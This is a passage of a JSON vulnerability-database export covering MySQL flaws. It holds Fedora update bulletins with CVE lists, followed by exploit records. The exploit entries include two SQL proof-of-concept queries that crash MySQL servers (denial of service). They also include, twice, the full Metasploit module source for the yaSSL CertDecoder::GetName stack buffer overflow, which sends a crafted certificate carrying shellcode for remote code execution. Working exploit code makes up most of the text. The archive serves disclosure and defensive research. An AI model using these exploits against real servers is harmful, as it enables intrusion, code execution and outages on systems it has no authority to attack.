files. ", "modified": "2010-02-02T01:06:45", "published": "2010-02-02T01:06:45", "id": "FEDORA:5556910F97B", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: mysql-5.1.42-7.fc11", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-02-02T01:18:20", "published": "2010-02-02T01:18:20", "id": "FEDORA:53A031103AB", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mysql-5.1.42-7.fc12", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4019", "CVE-2009-4028"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2009-12-22T04:48:21", "published": "2009-12-22T04:48:21", "id": "FEDORA:E042C10F862", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mysql-5.1.41-2.fc12", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:49", "bulletinFamily": "unix", "cvelist": ["CVE-2009-4019", "CVE-2009-4028"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2009-12-22T04:54:08", "published": "2009-12-22T04:54:08", "id": "FEDORA:41D4310F862", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: mysql-5.1.41-2.fc11", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019", "CVE-2010-1621"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-05-13T19:27:15", "published": "2010-05-13T19:27:15", "id": "FEDORA:833EA11074F", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: mysql-5.1.46-1.fc11", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019", "CVE-2010-1621"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-05-13T19:32:29", "published": "2010-05-13T19:32:29", "id": "FEDORA:2AF81110A48", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mysql-5.1.46-1.fc12", "cvss": {"score": 6.0, "vector": "AV:N/AC:M/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019", "CVE-2010-1848", "CVE-2010-1849", "CVE-2010-1850"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-06-07T22:32:00", "published": "2010-06-07T22:32:00", "id": "FEDORA:BAEB610FD1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 11 Update: mysql-5.1.47-1.fc11", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019", "CVE-2010-1848", "CVE-2010-1849", "CVE-2010-1850"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-06-07T22:28:04", "published": "2010-06-07T22:28:04", "id": "FEDORA:40AEE10FD1C", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mysql-5.1.47-1.fc12", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:50", "bulletinFamily": "unix", "cvelist": ["CVE-2008-7247", "CVE-2009-4019", "CVE-2010-1848", "CVE-2010-1849", "CVE-2010-1850", "CVE-2010-2008"], "description": "MySQL is a multi-user, multi-threaded SQL database server. MySQL is a client/server implementation consisting of a server daemon (mysqld) and many different client programs and libraries. The base package contains the standard MySQL client programs and generic MySQL files. ", "modified": "2010-08-03T00:36:28", "published": "2010-08-03T00:36:28", "id": "FEDORA:32B5F1112EF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 12 Update: mysql-5.1.47-2.fc12", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-02-03T19:06:41", "description": "MySQL 6.0.9 GeomFromWKB() Function First Argument Geometry Value Handling DoS. CVE-2009-4019. Dos exploit for linux platform", "published": "2009-11-23T00:00:00", "type": "exploitdb", "title": "MySQL <= 6.0.9 GeomFromWKB Function First Argument Geometry Value Handling DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "modified": "2009-11-23T00:00:00", "id": "EDB-ID:33398", "href": "https://www.exploit-db.com/exploits/33398/", "sourceData": "source: http://www.securityfocus.com/bid/37297/info\r\n \r\nMySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.\r\n \r\nAn attacker can exploit these issues to crash the application, denying access to legitimate users.\r\n \r\nVersions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. \r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`c0` bigint,`c3` multipolygon);\r\ninsert into `t1` values \r\n(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));\r\nselect 1 from `t1` where \r\n`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33398/"}, {"lastseen": "2016-02-03T19:06:33", "description": "MySQL 6.0.9 SELECT Statement WHERE Clause Sub-query DoS. CVE-2009-4019. Dos exploit for linux platform", "published": "2009-11-23T00:00:00", "type": "exploitdb", "title": "MySQL <= 6.0.9 SELECT Statement WHERE Clause Sub-query DoS", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4019"], "modified": "2009-11-23T00:00:00", "id": "EDB-ID:33397", "href": "https://www.exploit-db.com/exploits/33397/", "sourceData": "source: http://www.securityfocus.com/bid/37297/info\r\n\r\nMySQL is prone to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions.\r\n\r\nAn attacker can exploit these issues to crash the application, denying access to legitimate users.\r\n\r\nVersions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. \r\n\r\ndrop table if exists `t1`;\r\ncreate table `t1`(`a` float);\r\ninsert into `t1` values (-2),(-1);\r\nselect 1 from `t1`\r\nwhere\r\n`a` <> '1' and not\r\nrow(`a`,`a`) <=>\r\nrow((select 1 from `t1` where 1=2),(select 1 from `t1`)) \r\ninto @`var0`;\r\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:NONE/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33397/"}, {"lastseen": "2016-02-02T06:39:54", "description": "MySQL yaSSL CertDecoder::GetName Buffer Overflow. CVE-2009-4484. Remote exploit for linux platform", "published": "2010-04-30T00:00:00", "type": "exploitdb", "title": "MySQL yaSSL CertDecoder::GetName Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4484"], "modified": "2010-04-30T00:00:00", "id": "EDB-ID:16850", "href": "https://www.exploit-db.com/exploits/16850/", "sourceData": "##\r\n# $Id: mysql_yassl_getname.rb 9179 2010-04-30 08:40:19Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GoodRanking\r\n\r\n\tinclude Msf::Exploit::Remote::Tcp\r\n\tinclude Msf::Exploit::Remote::Seh\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\r\n\t\t\t\timplementation bundled with MySQL. By sending a specially crafted\r\n\t\t\t\tclient certificate, an attacker can execute arbitrary code.\r\n\r\n\t\t\t\tThis vulnerability is present within the CertDecoder::GetName function inside\r\n\t\t\t\t\"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\r\n\t\t\t\twithin a parent function's stack frame.\r\n\r\n\t\t\t\tNOTE: This vulnerability requires a non-default configuration. First, the attacker\r\n\t\t\t\tmust be able to pass the host-based authentication. Next, the server must be\r\n\t\t\t\tconfigured to listen on an accessible network interface. Lastly, the server\r\n\t\t\t\tmust have been manually configured to use SSL.\r\n\r\n\t\t\t\tThe binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\r\n\t\t\t\ton Windows XP SP3, these protections successfully prevented exploitation.\r\n\r\n\t\t\t\tTesting was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\r\n\t\t\t\tpresent, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\r\n\t\t\t\tpackage were not exploitable due to the use of the compiler's FORTIFY feature.\r\n\r\n\t\t\t\tAlthough suse11 was mentioned in the original blog post, the binary package they\r\n\t\t\t\tprovide does not contain yaSSL or support SSL.\r\n\t\t\t},\r\n\t\t\t'Author' => [ 'jduck' ],\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Version' => '$Revision: 9179 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2009-4484' ],\r\n\t\t\t\t\t[ 'BID', '37640' ],\r\n\t\t\t\t\t[ 'BID', '37943' ],\r\n\t\t\t\t\t[ 'BID', '37974' ],\r\n\t\t\t\t\t[ 'OSVDB', '61956' ],\r\n\t\t\t\t\t[ 'URL', 'http://secunia.com/advisories/38344/' ],\r\n\t\t\t\t\t[ 'URL', 'http://intevydis.blogspot.com/2010/01/mysq-yassl-stack-overflow.html' ]\r\n\t\t\t\t],\r\n\t\t\t'Privileged' => true,\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'thread',\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1046,\r\n\t\t\t\t\t'BadChars' => \"\",\r\n\t\t\t\t\t'StackAdjustment' => -3500,\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'linux',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'Automatic', { } ],\r\n\t\t\t\t\t[ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultTarget' => 0,\r\n\t\t\t'DisclosureDate' => 'Jan 25 2010'))\r\n\r\n\t\tregister_options([ Opt::RPORT(3306) ], self)\r\n\tend\r\n\r\n\tdef exploit\r\n\r\n\t\tconnect\r\n\r\n\t\t# read the mysql server hello :)\r\n\t\tversion = nil\r\n\t\tif (buf = sock.get_once(-1, 5))\r\n\t\t\t#print_status(\"\\n\" + Rex::Text.to_hex_dump(buf))\r\n\t\t\tif (buf =~ /is not allowed to connect/)\r\n\t\t\t\traise RuntimeError, 'The server refused our connection!'\r\n\t\t\tend\r\n\r\n\t\t\tlen1,cmd = buf[0,5].unpack('VC')\r\n\t\t\trest = buf[5,len1]\r\n\t\t\tidx = rest.index(\"\\x00\")\r\n\t\t\tif (idx)\r\n\t\t\t\tversion = rest[0,idx]\r\n\t\t\t\tprint_status(\"Server reports version: #{version}\")\r\n\t\t\tend\r\n\t\tend\r\n\r\n\t\t# handle automatic target selection\r\n\t\tmytarget = nil\r\n\t\tif (target.name =~ /Automatic/)\r\n\t\t\tprint_status(\"Attempting to locate a corresponding target\")\r\n\t\t\tversion = \"(\" + version + \")\"\r\n\t\t\ttargets.each { |tgt|\r\n\t\t\t\tif (tgt.name.include?(version))\r\n\t\t\t\t\tmytarget = tgt\r\n\t\t\t\tend\r\n\t\t\t}\r\n\r\n\t\t\tif (not mytarget)\r\n\t\t\t\traise RuntimeError, 'Unable to detect target automatically'\r\n\t\t\telse\r\n\t\t\t\tprint_status(\"Using automatically detected target: #{mytarget.name}\")\r\n\t\t\tend\r\n\t\telse\r\n\t\t\tmytarget = target\r\n\t\t\tprint_status(\"Trying target #{mytarget.name}...\")\r\n\t\tend\r\n\r\n\t\t# create/send the hello packet\r\n\t\thello = [0x01000020].pack('V')\r\n\t\thello << \"\\x85\\xae\\x03\\x00\"+\"\\x00\\x00\\x00\\x01\"+\"\\x08\\x00\\x00\\x00\"\r\n\t\thello << \"\\x00\" * 20\r\n\t\thello << \"\\x16\\x03\\x01\\x00\\x60\\x01\\x00\\x00\\x5c\\x03\\x01\\x4a\\x92\\xce\\xd1\\xe1\"\r\n\t\thello << \"\\xab\\x48\\x51\\xc8\\x49\\xa3\\x5e\\x97\\x1a\\xea\\xc2\\x99\\x82\\x33\\x42\\xd5\"\r\n\t\thello << \"\\x14\\xbc\\x05\\x64\\xdc\\xb5\\x48\\xbd\\x4c\\x11\\x55\\x00\\x00\\x34\\x00\\x39\"\r\n\t\thello << \"\\x00\\x38\\x00\\x35\\x00\\x16\\x00\\x13\\x00\\x0a\\x00\\x33\\x00\\x32\\x00\\x2f\"\r\n\t\thello << \"\\x00\\x66\\x00\\x05\\x00\\x04\\x00\\x63\\x00\\x62\\x00\\x61\\x00\\x15\\x00\\x12\"\r\n\t\thello << \"\\x00\\x09\\x00\\x65\\x00\\x64\\x00\\x60\\x00\\x14\\x00\\x11\\x00\\x08\\x00\\x06\"\r\n\t\thello << \"\\x00\\x03\\x02\\x01\\x00\"\r\n\t\tsock.put(hello)\r\n\r\n\r\n\t\t# build a cn that will trigger the vulnerability\r\n\t\tcn = rand_text(payload_space - payload.encoded.length)\r\n\t\tcn << payload.encoded\r\n\t\tcn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)\r\n\t\t# NOTE: x in above (also gets passed to free())\r\n\t\tpad = 1074 - payload_space\r\n\t\tcn << rand_text(pad)\r\n\t\tcn << [mytarget['JmpEsp']].pack('V')\r\n\t\tdistance = 4 + pad + 8 + payload.encoded.length\r\n\t\tcn << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\r\n\r\n\t\tcert = \"\\x2a\\x86\\x00\\x84\"\r\n\t\tcert << [cn.length].pack('N')\r\n\t\tcert << cn\r\n\t\tcert = \"\\x30\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x31\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x30\"+\r\n\t\t\t\"\\x82\\x01\\x01\"+\r\n\t\t\t\"\\x06\"+\r\n\t\t\t\"\\x82\\x00\\x02\" +\r\n\t\t\tcert\r\n\r\n\t\tcert = \"\\xa0\\x03\" +\r\n\t\t\t\"\\x02\\x01\\x02\" +\r\n\t\t\t\"\\x02\\x01\\x00\" +\r\n\t\t\t\"\\x30\" + \"\\x0d\" + \"\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\" +\r\n\t\t\tcert\r\n\r\n\t\t# wrap in 2 sequences\r\n\t\tcert = SNMP::BER.encode_tlv(0x30, cert)\r\n\t\tcert = SNMP::BER.encode_tlv(0x30, cert)\r\n\r\n\t\tcert1 = big_endian_24bit(cert.length) + cert\r\n\t\tcerts = big_endian_24bit(cert1.length) + cert1\r\n\r\n\t\thandshake = \"\\x0b\" + big_endian_24bit(certs.length) + certs\r\n\t\tmsg = \"\\x16\\x03\\x01\"\r\n\t\tmsg << [handshake.length].pack('n')\r\n\t\tmsg << handshake\r\n\r\n\t\tsock.put(msg)\r\n\r\n\t\thandler\r\n\t\tdisconnect\r\n\tend\r\n\r\n\r\n\tdef big_endian_24bit(len)\r\n\t\tuno = (len >> 16) & 0xff\r\n\t\tdos = (len >> 8) & 0xff\r\n\t\ttre = len & 0xff\r\n\t\t[uno,dos,tre].pack('C*')\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/16850/"}], "metasploit": [{"lastseen": "2020-07-20T10:38:04", "description": "This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier) implementation bundled with MySQL. By sending a specially crafted client certificate, an attacker can execute arbitrary code. This vulnerability is present within the CertDecoder::GetName function inside \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists within a parent function's stack frame. NOTE: This vulnerability requires a non-default configuration. First, the attacker must be able to pass the host-based authentication. Next, the server must be configured to listen on an accessible network interface. Lastly, the server must have been manually configured to use SSL. The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing on Windows XP SP3, these protections successfully prevented exploitation. Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary package were not exploitable due to the use of the compiler's FORTIFY feature. Although suse11 was mentioned in the original blog post, the binary package they provide does not contain yaSSL or support SSL.\n", "published": "2010-01-27T23:24:44", "type": "metasploit", "title": "MySQL yaSSL CertDecoder::GetName Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-4484"], "modified": "2017-07-24T13:26:21", "id": "MSF:EXPLOIT/LINUX/MYSQL/MYSQL_YASSL_GETNAME", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::Tcp\n include Msf::Exploit::Remote::Seh\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'MySQL yaSSL CertDecoder::GetName Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in the yaSSL (1.9.8 and earlier)\n implementation bundled with MySQL. By sending a specially crafted\n client certificate, an attacker can execute arbitrary code.\n\n This vulnerability is present within the CertDecoder::GetName function inside\n \"taocrypt/src/asn.cpp\". However, the stack buffer that is written to exists\n within a parent function's stack frame.\n\n NOTE: This vulnerability requires a non-default configuration. First, the attacker\n must be able to pass the host-based authentication. Next, the server must be\n configured to listen on an accessible network interface. Lastly, the server\n must have been manually configured to use SSL.\n\n The binary from version 5.5.0-m2 was built with /GS and /SafeSEH. During testing\n on Windows XP SP3, these protections successfully prevented exploitation.\n\n Testing was also done with mysql on Ubuntu 9.04. Although the vulnerable code is\n present, both version 5.5.0-m2 built from source and version 5.0.75 from a binary\n package were not exploitable due to the use of the compiler's FORTIFY feature.\n\n Although suse11 was mentioned in the original blog post, the binary package they\n provide does not contain yaSSL or support SSL.\n },\n 'Author' => [ 'jduck' ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-4484' ],\n [ 'BID', '37640' ],\n [ 'BID', '37943' ],\n [ 'BID', '37974' ],\n [ 'OSVDB', '61956' ],\n [ 'URL', 'http://secunia.com/advisories/38344/' ]\n ],\n 'Privileged' => true,\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'thread',\n },\n 'Payload' =>\n {\n 'Space' => 1046,\n 'BadChars' => \"\",\n 'StackAdjustment' => -3500,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n [ 'Automatic', { } ],\n [ 'Debian 5.0 - MySQL (5.0.51a-24+lenny2)', { 'JmpEsp' => 0x0807dc34 } ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Jan 25 2010'))\n\n register_options([ Opt::RPORT(3306) ], self)\n end\n\n def exploit\n\n connect\n\n # read the mysql server hello :)\n version = nil\n if (buf = sock.get_once(-1, 5) || '')\n #print_status(\"\\n\" + Rex::Text.to_hex_dump(buf))\n if (buf =~ /is not allowed to connect/)\n fail_with(Failure::Unreachable, 'The server refused our connection!')\n end\n\n len1,cmd = buf[0,5].unpack('VC')\n rest = buf[5,len1]\n idx = rest.index(\"\\x00\")\n if (idx)\n version = rest[0,idx]\n print_status(\"Server reports version: #{version}\")\n end\n end\n\n # handle automatic target selection\n mytarget = nil\n if (target.name =~ /Automatic/)\n print_status(\"Attempting to locate a corresponding target\")\n version = \"(\" + version + \")\"\n targets.each { |tgt|\n if (tgt.name.include?(version))\n mytarget = tgt\n end\n }\n\n if (not mytarget)\n fail_with(Failure::NoTarget, 'Unable to detect target automatically')\n else\n print_status(\"Using automatically detected target: #{mytarget.name}\")\n end\n else\n mytarget = target\n print_status(\"Trying target #{mytarget.name}...\")\n end\n\n # create/send the hello packet\n hello = [0x01000020].pack('V')\n hello << \"\\x85\\xae\\x03\\x00\"+\"\\x00\\x00\\x00\\x01\"+\"\\x08\\x00\\x00\\x00\"\n hello << \"\\x00\" * 20\n hello << \"\\x16\\x03\\x01\\x00\\x60\\x01\\x00\\x00\\x5c\\x03\\x01\\x4a\\x92\\xce\\xd1\\xe1\"\n hello << \"\\xab\\x48\\x51\\xc8\\x49\\xa3\\x5e\\x97\\x1a\\xea\\xc2\\x99\\x82\\x33\\x42\\xd5\"\n hello << \"\\x14\\xbc\\x05\\x64\\xdc\\xb5\\x48\\xbd\\x4c\\x11\\x55\\x00\\x00\\x34\\x00\\x39\"\n hello << \"\\x00\\x38\\x00\\x35\\x00\\x16\\x00\\x13\\x00\\x0a\\x00\\x33\\x00\\x32\\x00\\x2f\"\n hello << \"\\x00\\x66\\x00\\x05\\x00\\x04\\x00\\x63\\x00\\x62\\x00\\x61\\x00\\x15\\x00\\x12\"\n hello << \"\\x00\\x09\\x00\\x65\\x00\\x64\\x00\\x60\\x00\\x14\\x00\\x11\\x00\\x08\\x00\\x06\"\n hello << \"\\x00\\x03\\x02\\x01\\x00\"\n sock.put(hello)\n\n\n # build a cn that will trigger the vulnerability\n cn = rand_text(payload_space - payload.encoded.length)\n cn << payload.encoded\n cn << [0,0].pack('VV') # memset(x,0,0); (this is x and the length)\n # NOTE: x in above (also gets passed to free())\n pad = 1074 - payload_space\n cn << rand_text(pad)\n cn << [mytarget['JmpEsp']].pack('V')\n distance = 4 + pad + 8 + payload.encoded.length\n cn << Metasm::Shellcode.assemble(Metasm::Ia32.new, \"jmp $-\" + distance.to_s).encode_string\n\n cert = \"\\x2a\\x86\\x00\\x84\"\n cert << [cn.length].pack('N')\n cert << cn\n cert = \"\\x30\"+\n \"\\x82\\x01\\x01\"+\n \"\\x31\"+\n \"\\x82\\x01\\x01\"+\n \"\\x30\"+\n \"\\x82\\x01\\x01\"+\n \"\\x06\"+\n \"\\x82\\x00\\x02\" +\n cert\n\n cert = \"\\xa0\\x03\" +\n \"\\x02\\x01\\x02\" +\n \"\\x02\\x01\\x00\" +\n \"\\x30\" + \"\\x0d\" + \"\\x06\\x09\\x2a\\x86\\x48\\x86\\xf7\\x0d\\x01\\x01\\x04\\x05\\x00\" +\n cert\n\n # wrap in 2 sequences\n cert = SNMP::BER.encode_tlv(0x30, cert)\n cert = SNMP::BER.encode_tlv(0x30, cert)\n\n cert1 = big_endian_24bit(cert.length) + cert\n certs = big_endian_24bit(cert1.length) + cert1\n\n handshake = \"\\x0b\" + big_endian_24bit(certs.length) + certs\n msg = \"\\x16\\x03\\x01\"\n msg << [handshake.length].pack('n')\n msg << handshake\n\n sock.put(msg)\n\n handler\n disconnect\n end\n\n\n def big_endian_24bit(len)\n uno = (len >> 16) & 0xff\n dos = (len >> 8) & 0xff\n tre = len & 0xff\n [uno,dos,tre].pack('C*')\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/mysql/mysql_yassl_getname.rb"}]}